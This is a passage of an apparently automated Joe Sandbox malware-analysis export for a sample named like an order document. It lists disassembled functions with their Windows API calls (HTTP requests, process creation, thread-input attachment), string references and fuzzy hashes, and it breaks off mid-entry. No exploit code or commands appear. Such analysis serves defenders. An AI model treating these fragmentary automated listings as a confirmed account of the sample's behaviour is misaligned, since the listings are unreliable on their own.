Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 578c9b1b206952d302affdcfa7746bd2bdf3308ed4e33d94786b63cbb9f18845
Instruction ID: 6169de0f2218d960c0ab1a07c4e34582c49a3c026cf62a9345236731c9483be2
Opcode Fuzzy Hash: 578c9b1b206952d302affdcfa7746bd2bdf3308ed4e33d94786b63cbb9f18845
Instruction Fuzzy Hash: 5B5190316046009FD710AF65CC45B2ABBE4AF48315F04496EFE95A72E2DF78E849CB4A

Function 00469E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00469E5B
CreateMenu.USER32 ref: 00469E76
SetMenu.USER32(?,00000000), ref: 00469E85
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00469F12
IsMenu.USER32(?), ref: 00469F28
CreatePopupMenu.USER32 ref: 00469F32
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00469F63
DrawMenuBar.USER32 ref: 00469F71

Strings

0, xrefs: 00469E54

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: 27fdf799fc3312ba9b89a10b502947788258f07fb1c499343cfc636f11ad2cae
Instruction ID: 5b020405c1167199920ca5d7ab830315b5c1bbabc1390c57bb938a21d8a5ee9d
Opcode Fuzzy Hash: 27fdf799fc3312ba9b89a10b502947788258f07fb1c499343cfc636f11ad2cae
Instruction Fuzzy Hash: 3241A874A01208AFDB14DFA4D844BAABBB9FF48304F05402AF905A73A1E374AC10CF59

Function 0044E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0044E40C
GetLastError.KERNEL32 ref: 0044E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0044E483

Strings

READONLY, xrefs: 0044E44E
INVALID, xrefs: 0044E455
NOTREADY, xrefs: 0044E442
READY, xrefs: 0044E45C
UNKNOWN, xrefs: 0044E43B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 01ba7ce30ddbc10fde12fee7c343b026316a3d7d4d61aa6e2f42a8b7e63d1a86
Instruction ID: deef7bb9133456d45671f0089767791a2d6dc48f87c92770ff7c575c249a761d
Opcode Fuzzy Hash: 01ba7ce30ddbc10fde12fee7c343b026316a3d7d4d61aa6e2f42a8b7e63d1a86
Instruction Fuzzy Hash: F7319635A00205DFE701DFA6C885ABEBBB4FF04304F14852BE505A72D1D7789902CB59

Function 0043B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0043B98C
GetDlgCtrlID.USER32 ref: 0043B997
GetParent.USER32 ref: 0043B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0043B9B6
GetDlgCtrlID.USER32(?), ref: 0043B9BF
GetParent.USER32(?), ref: 0043B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0043B9DE

Strings

ListBox, xrefs: 0043B949
ComboBox, xrefs: 0043B911

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 3bcb663be40f995116a4500a94c10027ba1feaa6554d7cd177f255e44a571ec5
Instruction ID: a07899d160a5e18dd00fdcc05e482e6a444e85eff54bdb180093bf107e1422ec
Opcode Fuzzy Hash: 3bcb663be40f995116a4500a94c10027ba1feaa6554d7cd177f255e44a571ec5
Instruction Fuzzy Hash: 7621D6B4900108BFCB04ABA1DC86FFEB774EF49300F10022AF651A32E1DB785815DB68

Function 0043B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0043BA73
GetDlgCtrlID.USER32 ref: 0043BA7E
GetParent.USER32 ref: 0043BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0043BA9D
GetDlgCtrlID.USER32(?), ref: 0043BAA6
GetParent.USER32(?), ref: 0043BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0043BAC5

Strings

ListBox, xrefs: 0043BA32
ComboBox, xrefs: 0043B9FA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 59888c3b27fd14752752993d2d9eb33296def0342838a18ce09273204faf2c51
Instruction ID: c0e5afae8c8e13aff3e19bf3cbcad26b141080f5ba7c41a1646e7bea24d3a6bf
Opcode Fuzzy Hash: 59888c3b27fd14752752993d2d9eb33296def0342838a18ce09273204faf2c51
Instruction Fuzzy Hash: 5C21C5B4E00108BFDB01AB64DC85FFEB775EF49304F10012AF551A32D1EBB959159B68

Function 0043BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0043BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0043BAF8
_wcscmp.LIBCMT ref: 0043BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0043BB85

Strings

largeicons, xrefs: 0043BB19
list, xrefs: 0043BB67
details, xrefs: 0043BB33
smallicons, xrefs: 0043BB4D
SHELLDLL_DefView, xrefs: 0043BB04

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: c451a03d17e809ab73e8b0cdf2e8c7bbff5350a593939ca333ebd2375d143aa1
Instruction ID: 2070b6ab83162e7f047df6f48df3bdaf150f91585804ba7c5810778eb6538e82
Opcode Fuzzy Hash: c451a03d17e809ab73e8b0cdf2e8c7bbff5350a593939ca333ebd2375d143aa1
Instruction Fuzzy Hash: 95110436648306F9FA206621AC17FA7B79CDF18324F200027FA14E14D6FFE9681145AC

Function 0045B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045B2D5
CoInitialize.OLE32(00000000), ref: 0045B302
CoUninitialize.OLE32 ref: 0045B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0045B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0045B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0045B56D
CoGetObject.OLE32(?,00000000,0048D91C,?), ref: 0045B590
SetErrorMode.KERNEL32(00000000), ref: 0045B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045B623
VariantClear.OLEAUT32(0048D91C), ref: 0045B633

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 301dd562f504750e18c9c09a54e90c3d09a2858f6c32928bb50ba07065798680
Instruction ID: 3a49f2702521660ca2d56ed100b0fa379dcf273da301727b518e4a995d1f856e
Opcode Fuzzy Hash: 301dd562f504750e18c9c09a54e90c3d09a2858f6c32928bb50ba07065798680
Instruction Fuzzy Hash: 64C13671608304AFC704EF65C88492BB7E9FF88309F00492EF9899B252D775ED09CB96

Function 00444025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00444047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,004430A5,?,00000001), ref: 0044405B
GetWindowThreadProcessId.USER32(00000000), ref: 00444062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 00444071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00444083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 0044409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 004440AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 004440F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 00444108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 00444113

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: e5d4fd48dc500434fe148b757332dce145f8f0d543d7b8699ee7a378b0749fbc
Instruction ID: 6ecddd2d5d529813481c134c16481e56c21dc0cb4356134cfef7aefd52ab227f
Opcode Fuzzy Hash: e5d4fd48dc500434fe148b757332dce145f8f0d543d7b8699ee7a378b0749fbc
Instruction Fuzzy Hash: 1631A772900204AFEB10DF54DC49F6E77A9BB98312F10C02AF905E6390DB78DD408B5C

Function 00403093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004030DC
CoUninitialize.OLE32(?,00000000), ref: 00403181
UnregisterHotKey.USER32(?), ref: 004032A9
DestroyWindow.USER32(?), ref: 00475079
FreeLibrary.KERNEL32(?), ref: 004750F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00475125

Strings

close all, xrefs: 004030D7

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7b7400051c2ada79cba5ba7ff8586f32f1852a9ca515f089c74618a919c30194
Instruction ID: 5a794c083a5269744521f991c5528a76a1dc2fb916643718be34c64ed1899f27
Opcode Fuzzy Hash: 7b7400051c2ada79cba5ba7ff8586f32f1852a9ca515f089c74618a919c30194
Instruction Fuzzy Hash: 19914E74601102DFC705EF15C895AA9F7A8FF05309F5481BEE50A6B2A2DF38AE56CF48

Function 0041CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0041CC15

Part of subcall function 0041CCCD: GetClientRect.USER32(?,?), ref: 0041CCF6
Part of subcall function 0041CCCD: GetWindowRect.USER32(?,?), ref: 0041CD37
Part of subcall function 0041CCCD: ScreenToClient.USER32(?,000000FF), ref: 0041CD5F

GetDC.USER32 ref: 0047D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0047D14A
SelectObject.GDI32(00000000,00000000), ref: 0047D158
SelectObject.GDI32(00000000,00000000), ref: 0047D16D
ReleaseDC.USER32(?,00000000), ref: 0047D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0047D200

Strings

U, xrefs: 0047D0D5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 9b1189af9f9d2797b20c1643d86672004d3032e085e3daf74aa7ecbd43cb017f
Instruction ID: 9a6e06668591dea6332ce3a20a7db368b064226a46ae5558b1ec45aff3e26ff4
Opcode Fuzzy Hash: 9b1189af9f9d2797b20c1643d86672004d3032e085e3daf74aa7ecbd43cb017f
Instruction Fuzzy Hash: C1710630900205DFCF219F64CC81AEA3BB1FF48314F14866BED599A2A6D7399C82DF59

Function 004545C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004545FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0045466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00454682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0045468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004546BF
InternetCloseHandle.WININET(00000000), ref: 00454706

Part of subcall function 00455052: GetLastError.KERNEL32(?,?,004543CC,00000000,00000000,00000001), ref: 00455067

Strings

, xrefs: 004546B8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: a045060e8911059459431702f3733a8007696582b43d561265531298ad99e5da
Instruction ID: 06e4a2979523fa4a57f0d8e8717a317025dbf267735069217734f69923b342c5
Opcode Fuzzy Hash: a045060e8911059459431702f3733a8007696582b43d561265531298ad99e5da
Instruction Fuzzy Hash: FF4170B1501205BFEB019F50CC85FBF77ACEF49719F00402AFE059A186D77899899BA8

Function 004624D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004624F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00462688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004626AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004626EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0046270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0046286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004628A1
CloseHandle.KERNEL32(?), ref: 004628D0
CloseHandle.KERNEL32(?), ref: 00462947

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 675bb03dd881ec10f87567cf78142fd94200e65420925fc16cad194ef3292610
Instruction ID: 297d9b7ce7acee4b45dcf329f4ac40872c5cbc720c169c6e9c03bb5cd95c0242
Opcode Fuzzy Hash: 675bb03dd881ec10f87567cf78142fd94200e65420925fc16cad194ef3292610
Instruction Fuzzy Hash: 92D1B231604700EFCB14EF25C991A6EBBE1AF84314F14856EF8859B3A2DB78DC45CB5A

Function 0046B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0046B3F4

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 2b2e2412faa94b9c02971741ac5eee4fa327bbf56592b03e2262d51f7cc935d2
Instruction ID: 37315d118532037fd48edcb4b58127136346e69ed462c9549075cd98b53ef0c5
Opcode Fuzzy Hash: 2b2e2412faa94b9c02971741ac5eee4fa327bbf56592b03e2262d51f7cc935d2
Instruction Fuzzy Hash: 44517431600204BBDF249F158C85B9E3B64EB05318F644517FA15D63E2EB79E9D08BDA

Function 0041A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0047DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0047DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0047DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0047DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0047DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0041A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0047DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0047DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0041A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0047DBC8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 0cf6ee739ab52051da489bb8517c88828cd0cf7fce358cea2fa76b683adbfda0
Instruction ID: fadf16feb8645e96a8cf497107f48763286d092d757fb9cbab283d3aeb1fb45e
Opcode Fuzzy Hash: 0cf6ee739ab52051da489bb8517c88828cd0cf7fce358cea2fa76b683adbfda0
Instruction Fuzzy Hash: 65519B30A01208EFDB20CF64CC81FEA37B4AF08354F10452AF95A962D0D7B8ED90CB59

Function 00447555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8

